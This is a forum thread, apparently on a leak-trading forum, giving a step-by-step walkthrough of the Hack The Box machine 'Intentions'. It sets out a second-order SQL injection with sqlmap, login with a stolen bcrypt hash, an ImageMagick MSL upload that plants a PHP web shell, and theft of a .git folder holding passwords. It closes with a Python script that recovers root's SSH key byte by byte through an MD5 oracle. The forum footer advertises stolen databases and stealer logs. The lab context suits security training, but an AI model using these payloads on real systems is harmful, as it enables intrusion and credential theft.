Intentions - Thread / Writeup
by rnoc - Friday July 7, 2023 at 05:53 AM
#1
nmap -sCV 10.129.18.135 -p- --min-rate 10000 -oA intentions.nmap Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-04 09:35 CEST Nmap scan report for 10.129.18.135 Host is up (0.039s latency). Not shown: 65533 closed tcp ports (conn-refused) PORT  STATE SERVICE VERSION 22/tcp open  ssh    OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |  256 47:d2:00:66:27:5e:e6:9c:80:89:03:b5:8f:9e:60:e5 (ECDSA) |_  256 c8:d0:ac:8d:29:9b:87:40:5f:1b:b0:a4:1d:53:8f:f1 (ED25519) 80/tcp open  http    nginx 1.18.0 (Ubuntu) |_http-title: Intentions |_http-server-header: nginx/1.18.0 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 16.02 seconds

wfuzz -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.129.18.135/FUZZ --sc=301,302,200 ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer                        * ******************************************************** Target: http://10.129.18.135/FUZZ Total requests: 220546 ===================================================================== ID          Response  Lines    Word      Chars      Payload                                                        ===================================================================== 000000154:  302        11 L    22 W      326 Ch      "gallery" 000000245:  302        11 L    22 W      326 Ch      "admin" 000000468:  301        7 L      12 W      178 Ch      "storage" 000000536:  301        7 L      12 W      178 Ch      "css" 000000939:  301        7 L      12 W      178 Ch      "js" 000001211:  302        11 L    22 W      326 Ch      "logout"                        000002757:  301        7 L      12 W      178 Ch      "fonts"

dirsearch -u http://10.129.18.135/js/ -e js Target: http://10.129.18.135/js/ [09:48:16] Starting: [09:48:16] 403 -  564B  - /js/%2e%2e;/test                                [09:48:34] 403 -  564B  - /js/admin/.config                                [09:48:34] 403 -  564B  - /js/admin/.htaccess [09:48:34] 200 -  304KB - /js/admin.js                                      [09:48:38] 403 -  564B  - /js/administrator/.htaccess                      [09:48:40] 403 -  564B  - /js/admpar/.ftppass                              [09:48:40] 403 -  564B  - /js/admrev/.ftppass                              [09:48:41] 403 -  564B  - /js/app/.htaccess                                [09:48:41] 200 -  424KB - /js/app.js                                        [09:48:44] 403 -  564B  - /js/bitrix/.settings.bak                          [09:48:44] 403 -  564B  - /js/bitrix/.settings.php.bak [09:48:44] 403 -  564B  - /js/bitrix/.settings                              [09:48:55] 403 -  564B  - /js/ext/.deps                                    [09:48:57] 200 -  304KB - /js/gallery.js                                    [09:49:03] 403 -  564B  - /js/lib/flex/varien/.flexLibProperties            [09:49:03] 403 -  564B  - /js/lib/flex/uploader/.project [09:49:03] 403 -  564B  - /js/lib/flex/uploader/.flexProperties [09:49:03] 403 -  564B  - /js/lib/flex/varien/.project [09:49:03] 403 -  564B  - /js/lib/flex/uploader/.actionScriptProperties [09:49:03] 403 -  564B  - /js/lib/flex/uploader/.settings [09:49:03] 403 -  564B  - /js/lib/flex/varien/.actionScriptProperties      [09:49:03] 403 -  564B  - /js/lib/flex/varien/.settings                    [09:49:05] 200 -  273KB - /js/login.js                                      [09:49:06] 403 -  564B  - /js/mailer/.env                                  [09:49:18] 403 -  564B  - /js/resources/sass/.sass-cache/                  [09:49:18] 403 -  564B  - /js/resources/.arch-internal-preview.css [09:49:26] 403 -  564B  - /js/twitter/.env 


SQL Injection 

POST /api/v1/gallery/user/genres HTTP/1.1 Host: 10.129.18.12 Content-Length: 19 Accept: application/json, text/plain, */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Content-Type: application/json Origin: http://10.129.18.12 Referer: http://10.129.18.12/gallery Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close {"genres":"*"} <-- when we modify this we can endup getting a return of 500 on the site where the injection would reflect. GET /api/v1/gallery/user/feed HTTP/1.1 Host: 10.129.18.12 Accept: application/json, text/plain, */* X-XSRF-TOKEN:<snip> X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Referer: http://10.129.18.12/gallery Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: <snip> Connection: close


sqlmap -r sqli.req --second-req safe.req --dump --tamper=space2comment -p genres --level 5 --risk 3 --dbms=mysql -threads=10


```mysql +----+--------------------------+-------+-------------------------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------------------------------------------------------+---------------------+---------------------+ | id | name                    | admin | email                        | genres                                                                                                                                                                                                                | password                                                    | created_at          | updated_at          | +----+--------------------------+-------+-------------------------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------------------------------------------------------+---------------------+---------------------+ | 1  | steve                    | 1    | steve@intentions.htb          | food,travel,nature                                                                                                                                                                                                    | $2y$10$M/g27T1kJcOpYOfPqQlI3.YfdLIwr3EWbzWOLfpoTtjpeMqpp4twa | 2023-02-02 17:43:00 | 2023-02-02 17:43:00 | | 2  | greg                    | 1    | greg@intentions.htb          | food,travel,nature                                                                                                                                                                                                    | $2y$10$95OR7nHSkYuFUUxsT1KS6uoQ93aufmrpknz4jwRqzIbsUpRiiyU5m | 2023-02-02 17:44:11 | 2023-02-02 17:44:11 |

POST /api/v2/auth/login HTTP/1.1 Host: 10.129.18.12 Content-Length: 111 Accept: application/json, text/plain, */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Content-Type: application/json Origin: http://10.129.18.12 Referer: http://10.129.18.12/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 {"email":"steve@intentions.htb", "hash":  "$2y$10$M/g27T1kJcOpYOfPqQlI3.YfdLIwr3EWbzWOLfpoTtjpeMqpp4twa" }

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Content-Type: application/json Connection: keep-alive Cache-Control: no-cache, private Date: Wed, 05 Jul 2023 08:34:27 GMT Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwOi8vMTAuMTI5LjE4LjEyL2FwaS92Mi9hdXRoL2xvZ2luIiwiaWF0IjoxNjg4NTQ2MDY3LCJleHAiOjE2ODg1Njc2NjcsIm5iZiI6MTY4ODU0NjA2NywianRpIjoidDd5SktXblRBdDV1SFVNSiIsInN1YiI6IjEiLCJwcnYiOiIyM2JkNWM4OTQ5ZjYwMGFkYjM5ZTcwMWM0MDA4NzJkYjdhNTk3NmY3In0.y4RD5uBmEHbnqSMtZQGjyDTYlSUXvPpp0lgLpG_6AXQ <-- save this in your browers storage under the cookie "token" to create a persistance session for browsing around for next step. X-RateLimit-Limit: 3600 X-RateLimit-Remaining: 3599 Access-Control-Allow-Origin: * Set-Cookie: token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwOi8vMTAuMTI5LjE4LjEyL2FwaS92Mi9hdXRoL2xvZ2luIiwiaWF0IjoxNjg4NTQ2MDY3LCJleHAiOjE2ODg1Njc2NjcsIm5iZiI6MTY4ODU0NjA2NywianRpIjoidDd5SktXblRBdDV1SFVNSiIsInN1YiI6IjEiLCJwcnYiOiIyM2JkNWM4OTQ5ZjYwMGFkYjM5ZTcwMWM0MDA4NzJkYjdhNTk3NmY3In0.y4RD5uBmEHbnqSMtZQGjyDTYlSUXvPpp0lgLpG_6AXQ; expires=Wed, 05-Jul-2023 14:34:27 GMT; Max-Age=21600; path=/; httponly; samesite=lax X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Content-Length: 35 {"status":"success","name":"steve"}
#2
### Revshell  from CVE
After browsing around on the site and checking burp continuously we found a potential place where an injection could happen.

And with some reading of the source code (in the js files) we find that its using imagick
and with some googling we come across this post.
[Exploiting Arbitrary Object Instantiations in PHP without Custom Classes – PT SWARM (ptsecurity.com)](https://swarm.ptsecurity.com/exploiting-...ntiations/)

Where it details some stuff regarding an exploit using imagick MSL.
And this is what you can do..

Lets start Burp and head over to the intruder tab.

Put this in your position section

```r
POST /api/v2/admin/image/modify?path=vid:msl:/tmp/php*&effect=none HTTP/1.1 Host: 10.129..xx.xx Cookie: token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwOi8vMTAuMTI5LjE1OC41L2FwaS92Mi9hdXRoL2xvZ2luIiwiaWF0IjoxNjg4NzE0MjMxLCJleHAiOjE2ODg3MzU4MzEsIm5iZiI6MTY4ODcxNDIzMSwianRpIjoienhhUk8wT25FZ2tZUHpMbyIsInN1YiI6IjEiLCJwcnYiOiIyM2JkNWM4OTQ5ZjYwMGFkYjM5ZTcwMWM0MDA4NzJkYjdhNTk3NmY3In0.7tNUFWEmIfoSCvP_SD3hIky5sQ3S4m3tYL6UimvBx6s Connection: close Content-Type: multipart/form-data; boundary=pingpong Content-Length: 298 --pingpong Content-Disposition: form-data; name="sploit"; filename="sploit.msl" Content-Type: text/plain <?xml version="1.0" encoding="UTF-8"?> <image> <read filename="caption:&lt;?php system($_GET['a']); ?&gt;" /> <write filename="info:/var/www/html/intentions/public/sploit.php" /> </image> --pingpong--




and in your payload section you need to set it to be a null payload and choose a high number.
say around 300 or so then start your attack.

Once you see you are getting status code 502 pause the attack and query the server with curl

curl -s -v  http://10.xx.xx..x/sploit.php?a=ls
caption:css favicon.ico fonts index.php js mix-manifest.json robots.txt storage

### User Shell
Using this shell i browse around a little and found that there is a .git folder just 1 step up so i decide to package that up with the following command

```shell
curl -s -v  http://10.xxx.xxx.x/sploit.php?a=tar+-cf+git.tar+../.git
```

and we download it with wget or curl

```shell
curl -s -v  http://10.xxx.xxx.x/git.tar -o git.tar
```

We extract it to a new folder  and run git log to see if there is anything interesting

```
tar -xvf git.tar $ git log                                                        commit 1f29dfde45c21be67bb2452b46d091888ed049c3 (HEAD -> master) Author: steve <steve@intentions.htb> Date:  Mon Jan 30 15:29:12 2023 +0100     Fix webpack for production commit f7c903a54cacc4b8f27e00dbf5b0eae4c16c3bb4 Author: greg <greg@intentions.htb> Date:  Thu Jan 26 09:21:52 2023 +0100     Test cases did not work on steve's local database, switching to user factory per his advice commit 36b4287cf2fb356d868e71dc1ac90fc8fa99d319 Author: greg <greg@intentions.htb> Date:  Wed Jan 25 20:45:12 2023 +0100     Adding test cases for the API! commit d7ef022d3bc4e6d02b127fd7dcc29c78047f31bd Author: steve <steve@intentions.htb> Date:  Fri Jan 20 14:19:32 2023 +0100     Initial v2 commit

```

going thru these entries we found 1 of them with some loot.
 git show f7c903a54cacc4b8f27e00dbf5b0eae4c16c3bb commit f7c903a54cacc4b8f27e00dbf5b0eae4c16c3bb4 Author: greg <greg@intentions.htb> Date:  Thu Jan 26 09:21:52 2023 +0100     Test cases did not work on steve's local database, switching to user factory per his advice diff --git a/tests/Feature/Helper.php b/tests/Feature/Helper.php index f57e37b..0586d51 100644 --- a/tests/Feature/Helper.php +++ b/tests/Feature/Helper.php @@ -8,12 +8,14 @@ class Helper extends TestCase {     public static function getToken($test, $admin = false) {         if($admin) { -            $res = $test->postJson('/api/v1/auth/login', ['email' => 'greg@intentions.htb', 'password' => 'Gr3g1sTh3xxxxx!1998!']); -            return $res->headers->get('Authorization'); +            $user = User::factory()->admin()->create();         }         else { -            $res = $test->postJson('/api/v1/auth/login', ['email' => 'greg_user@intentions.htb', 'password' => 'Gr3g1sTxxxxer!1998!']); -            return $res->headers->get('Authorization'); +            $user = User::factory()->create();         } +        +        $token = Auth::login($user); +        $user->delete(); +        return $token;     } }

```

Now lets try and ssh to the box as user greg with the password we found.

```
$ ssh -l greg 10.129.158.5 <snipped> greg@10.129.158.5's password: $ ls dmca_check.sh  dmca_hashes.test  user.txt $ cat user.txt 386ded7b5cxxxxxx25ac23bc $



And i am still working on root.
#3
(07-07-2023, 11:07 AM)rnoc Wrote: ### Revshell  from CVE
After browsing around on the site and checking burp continuously we found a potential place where an injection could happen.

And with some reading of the source code (in the js files) we find that its using imagick
and with some googling we come across this post.
[Exploiting Arbitrary Object Instantiations in PHP without Custom Classes – PT SWARM (ptsecurity.com)](https://swarm.ptsecurity.com/exploiting-...ntiations/)

Where it details some stuff regarding an exploit using imagick MSL.
And this is what you can do..

Lets start Burp and head over to the intruder tab.

Put this in your position section

```r
POST /api/v2/admin/image/modify?path=vid:msl:/tmp/php*&effect=none HTTP/1.1 Host: 10.129..xx.xx Cookie: token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwOi8vMTAuMTI5LjE1OC41L2FwaS92Mi9hdXRoL2xvZ2luIiwiaWF0IjoxNjg4NzE0MjMxLCJleHAiOjE2ODg3MzU4MzEsIm5iZiI6MTY4ODcxNDIzMSwianRpIjoienhhUk8wT25FZ2tZUHpMbyIsInN1YiI6IjEiLCJwcnYiOiIyM2JkNWM4OTQ5ZjYwMGFkYjM5ZTcwMWM0MDA4NzJkYjdhNTk3NmY3In0.7tNUFWEmIfoSCvP_SD3hIky5sQ3S4m3tYL6UimvBx6s Connection: close Content-Type: multipart/form-data; boundary=pingpong Content-Length: 298 --pingpong Content-Disposition: form-data; name="sploit"; filename="sploit.msl" Content-Type: text/plain <?xml version="1.0" encoding="UTF-8"?> <image> <read filename="caption:&lt;?php system($_GET['a']); ?&gt;" /> <write filename="info:/var/www/html/intentions/public/sploit.php" /> </image> --pingpong--




and in your payload section you need to set it to be a null payload and choose a high number.
say around 300 or so then start your attack.

Once you see you are getting status code 502 pause the attack and query the server with curl

curl -s -v  http://10.xx.xx..x/sploit.php?a=ls
caption:css favicon.ico fonts index.php js mix-manifest.json robots.txt storage

### User Shell
Using this shell i browse around a little and found that there is a .git folder just 1 step up so i decide to package that up with the following command

```shell
curl -s -v  http://10.xxx.xxx.x/sploit.php?a=tar+-cf+git.tar+../.git
```

and we download it with wget or curl

```shell
curl -s -v  http://10.xxx.xxx.x/git.tar -o git.tar
```

We extract it to a new folder  and run git log to see if there is anything interesting

```
tar -xvf git.tar $ git log                                                        commit 1f29dfde45c21be67bb2452b46d091888ed049c3 (HEAD -> master) Author: steve <steve@intentions.htb> Date:  Mon Jan 30 15:29:12 2023 +0100     Fix webpack for production commit f7c903a54cacc4b8f27e00dbf5b0eae4c16c3bb4 Author: greg <greg@intentions.htb> Date:  Thu Jan 26 09:21:52 2023 +0100     Test cases did not work on steve's local database, switching to user factory per his advice commit 36b4287cf2fb356d868e71dc1ac90fc8fa99d319 Author: greg <greg@intentions.htb> Date:  Wed Jan 25 20:45:12 2023 +0100     Adding test cases for the API! commit d7ef022d3bc4e6d02b127fd7dcc29c78047f31bd Author: steve <steve@intentions.htb> Date:  Fri Jan 20 14:19:32 2023 +0100     Initial v2 commit

```

going thru these entries we found 1 of them with some loot.
 git show f7c903a54cacc4b8f27e00dbf5b0eae4c16c3bb commit f7c903a54cacc4b8f27e00dbf5b0eae4c16c3bb4 Author: greg <greg@intentions.htb> Date:  Thu Jan 26 09:21:52 2023 +0100     Test cases did not work on steve's local database, switching to user factory per his advice diff --git a/tests/Feature/Helper.php b/tests/Feature/Helper.php index f57e37b..0586d51 100644 --- a/tests/Feature/Helper.php +++ b/tests/Feature/Helper.php @@ -8,12 +8,14 @@ class Helper extends TestCase {     public static function getToken($test, $admin = false) {         if($admin) { -            $res = $test->postJson('/api/v1/auth/login', ['email' => 'greg@intentions.htb', 'password' => 'Gr3g1sTh3xxxxx!1998!']); -            return $res->headers->get('Authorization'); +            $user = User::factory()->admin()->create();         }         else { -            $res = $test->postJson('/api/v1/auth/login', ['email' => 'greg_user@intentions.htb', 'password' => 'Gr3g1sTxxxxer!1998!']); -            return $res->headers->get('Authorization'); +            $user = User::factory()->create();         } +        +        $token = Auth::login($user); +        $user->delete(); +        return $token;     } }

```

Now lets try and ssh to the box as user greg with the password we found.

```
$ ssh -l greg 10.129.158.5 <snipped> greg@10.129.158.5's password: $ ls dmca_check.sh  dmca_hashes.test  user.txt $ cat user.txt 386ded7b5cxxxxxx25ac23bc $



And i am still working on root.

Root has to do with using /opt/scanner/scanner, which, with the -l flag allows you to get the MD5 hash of any file up to a -l bytes in length. So the idea is to brute force root's ssh key one byte at a time using this binary.
Ban reason: Spamming | Contact us via http://raiddfzn73ir6iyxlf7nwytnujiflddog...on/contact if you feel this is incorrect. (Permanent)
#4
with the intruder payload you provided, I'm getting "422 Unprocessable Content" and error msg:"bad image path", am i missing anything?
#5
(07-08-2023, 04:57 AM)LASER Wrote:
(07-08-2023, 03:58 AM)nnrrkk Wrote: with the intruder payload you provided, I'm getting "422 Unprocessable Content" and error msg:"bad image path", am i missing anything?

Same.

I am sending as like this, Is this wrong??
POST /api/v2/admin/image/modify?path=vid:msl:/tmp/php*&effect=none HTTP/1.1
Host: intentions.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=pingpong
X-XSRF-TOKEN: ey...
Content-Length: 125
Origin: http://intentions.htb
Connection: close
Referer: http://intentions.htb/admin
Cookie: XSRF-TOKEN=ey..; token=eyJ0...

--pingpong
Content-Disposition: form-data; name="sploit"; filename="sploit.msl"
Content-Type: text/plain
<?xml version="1.0" encoding="UTF-8"?>
<image>
<read filename="caption:&lt;?php system($_GET['a']); ?&gt;" />
<write filename="info:/var/www/html/intentions/public/sploit.php" />
</image>


--pingpong--

(07-07-2023, 08:55 PM)cutty Wrote:
(07-07-2023, 11:07 AM)rnoc Wrote: ### Revshell  from CVE
After browsing around on the site and checking burp continuously we found a potential place where an injection could happen.

And with some reading of the source code (in the js files) we find that its using imagick
and with some googling we come across this post.
[Exploiting Arbitrary Object Instantiations in PHP without Custom Classes – PT SWARM (ptsecurity.com)](https://swarm.ptsecurity.com/exploiting-...ntiations/)

Where it details some stuff regarding an exploit using imagick MSL.
And this is what you can do..

Lets start Burp and head over to the intruder tab.

Put this in your position section

```r
POST /api/v2/admin/image/modify?path=vid:msl:/tmp/php*&effect=none HTTP/1.1 Host: 10.129..xx.xx Cookie: token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwOi8vMTAuMTI5LjE1OC41L2FwaS92Mi9hdXRoL2xvZ2luIiwiaWF0IjoxNjg4NzE0MjMxLCJleHAiOjE2ODg3MzU4MzEsIm5iZiI6MTY4ODcxNDIzMSwianRpIjoienhhUk8wT25FZ2tZUHpMbyIsInN1YiI6IjEiLCJwcnYiOiIyM2JkNWM4OTQ5ZjYwMGFkYjM5ZTcwMWM0MDA4NzJkYjdhNTk3NmY3In0.7tNUFWEmIfoSCvP_SD3hIky5sQ3S4m3tYL6UimvBx6s Connection: close Content-Type: multipart/form-data; boundary=pingpong Content-Length: 298 --pingpong Content-Disposition: form-data; name="sploit"; filename="sploit.msl" Content-Type: text/plain <?xml version="1.0" encoding="UTF-8"?> <image> <read filename="caption:&lt;?php system($_GET['a']); ?&gt;" /> <write filename="info:/var/www/html/intentions/public/sploit.php" /> </image> --pingpong--




and in your payload section you need to set it to be a null payload and choose a high number.
say around 300 or so then start your attack.

Once you see you are getting status code 502 pause the attack and query the server with curl

curl -s -v  http://10.xx.xx..x/sploit.php?a=ls
caption:css favicon.ico fonts index.php js mix-manifest.json robots.txt storage

### User Shell
Using this shell i browse around a little and found that there is a .git folder just 1 step up so i decide to package that up with the following command

```shell
curl -s -v  http://10.xxx.xxx.x/sploit.php?a=tar+-cf+git.tar+../.git
```

and we download it with wget or curl

```shell
curl -s -v  http://10.xxx.xxx.x/git.tar -o git.tar
```

We extract it to a new folder  and run git log to see if there is anything interesting

```
tar -xvf git.tar $ git log                                                        commit 1f29dfde45c21be67bb2452b46d091888ed049c3 (HEAD -> master) Author: steve <steve@intentions.htb> Date:  Mon Jan 30 15:29:12 2023 +0100     Fix webpack for production commit f7c903a54cacc4b8f27e00dbf5b0eae4c16c3bb4 Author: greg <greg@intentions.htb> Date:  Thu Jan 26 09:21:52 2023 +0100     Test cases did not work on steve's local database, switching to user factory per his advice commit 36b4287cf2fb356d868e71dc1ac90fc8fa99d319 Author: greg <greg@intentions.htb> Date:  Wed Jan 25 20:45:12 2023 +0100     Adding test cases for the API! commit d7ef022d3bc4e6d02b127fd7dcc29c78047f31bd Author: steve <steve@intentions.htb> Date:  Fri Jan 20 14:19:32 2023 +0100     Initial v2 commit

```

going thru these entries we found 1 of them with some loot.
 git show f7c903a54cacc4b8f27e00dbf5b0eae4c16c3bb commit f7c903a54cacc4b8f27e00dbf5b0eae4c16c3bb4 Author: greg <greg@intentions.htb> Date:  Thu Jan 26 09:21:52 2023 +0100     Test cases did not work on steve's local database, switching to user factory per his advice diff --git a/tests/Feature/Helper.php b/tests/Feature/Helper.php index f57e37b..0586d51 100644 --- a/tests/Feature/Helper.php +++ b/tests/Feature/Helper.php @@ -8,12 +8,14 @@ class Helper extends TestCase {     public static function getToken($test, $admin = false) {         if($admin) { -            $res = $test->postJson('/api/v1/auth/login', ['email' => 'greg@intentions.htb', 'password' => 'Gr3g1sTh3xxxxx!1998!']); -            return $res->headers->get('Authorization'); +            $user = User::factory()->admin()->create();         }         else { -            $res = $test->postJson('/api/v1/auth/login', ['email' => 'greg_user@intentions.htb', 'password' => 'Gr3g1sTxxxxer!1998!']); -            return $res->headers->get('Authorization'); +            $user = User::factory()->create();         } +        +        $token = Auth::login($user); +        $user->delete(); +        return $token;     } }

```

Now lets try and ssh to the box as user greg with the password we found.

```
$ ssh -l greg 10.129.158.5 <snipped> greg@10.129.158.5's password: $ ls dmca_check.sh  dmca_hashes.test  user.txt $ cat user.txt 386ded7b5cxxxxxx25ac23bc $



And i am still working on root.

Root has to do with using /opt/scanner/scanner, which, with the -l flag allows you to get the MD5 hash of any file up to a -l bytes in length. So the idea is to brute force root's ssh key one byte at a time using this binary.


Can you share the script you used to get root??

Can you share how to get root??

import hashlib import os import string wordlist = string.printable result = "" def md5(data):         return hashlib.md5(data.encode()).hexdigest() def file_hash_by_len(filename, length):     command = f"/opt/scanner/scanner -c {filename} -l {length} -p -s 1234"     output = os.popen(command).read().split(" ")[-1].rstrip()     return output def get_next_char(target_hash):     global result     for char in wordlist:         test_data = result + char         test_hash = md5(test_data)         if target_hash == test_hash:             return char     return None def main():     global result     filename = input("File-Path: ")     byte_len = 1     while True:         target_hash = file_hash_by_len(filename, byte_len)         new_char = get_next_char(target_hash)         if not new_char:             break         result += new_char         byte_len += 1     print(result) if __name__ == "__main__":     main()

this is what I used.
#6
I used something similar actually.
#7
Where did you know those ( email and hash ) wen you do POST request in api ?
#8
The last non-spam response in the topic was more than a month ago. I close the topic as irrelevant to prevent spam. If this is not the case, please send a pm and I will open the topic for discussion again.
See dead links, reposts, or threads without samples in Databases/Other Leaks/Stealer logs? Report it or tag me @Addka72424
New on this forum? Check this thread | TOR
Want to get credits by reposting leaks? Check Earn credits by reposting leaks! | TOR
Want to add your thread to the official section? Check Add to official requests | TOR
Don't know how to use forum Escrow? Check How to use BreachForums escrow | TOR
Looking for verified leaks that haven't been added to the official index yet? Check Unofficial Database Index | TOR

:420line:


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] HackTheBox Dante - complete writeup written by Tamarisk Tamarisk 597 91,356 03-27-2026, 10:54 PM
Last Post: w3soul
  JET fortress writeup + flags ssrf 37 19,648 02-08-2026, 11:19 AM
Last Post: textfor
  Cybernetics writeup braun33 0 1,199 01-11-2026, 06:54 PM
Last Post: braun33
  cpts exam writeup trading hacker234324 5 2,320 01-06-2026, 06:02 PM
Last Post: draco17277
  HTB - backfire user+root|video 1080p|writeup tony_boom23 10 1,468 01-05-2026, 05:46 PM
Last Post: Damnitree



 Users browsing this thread: 1 Guest(s)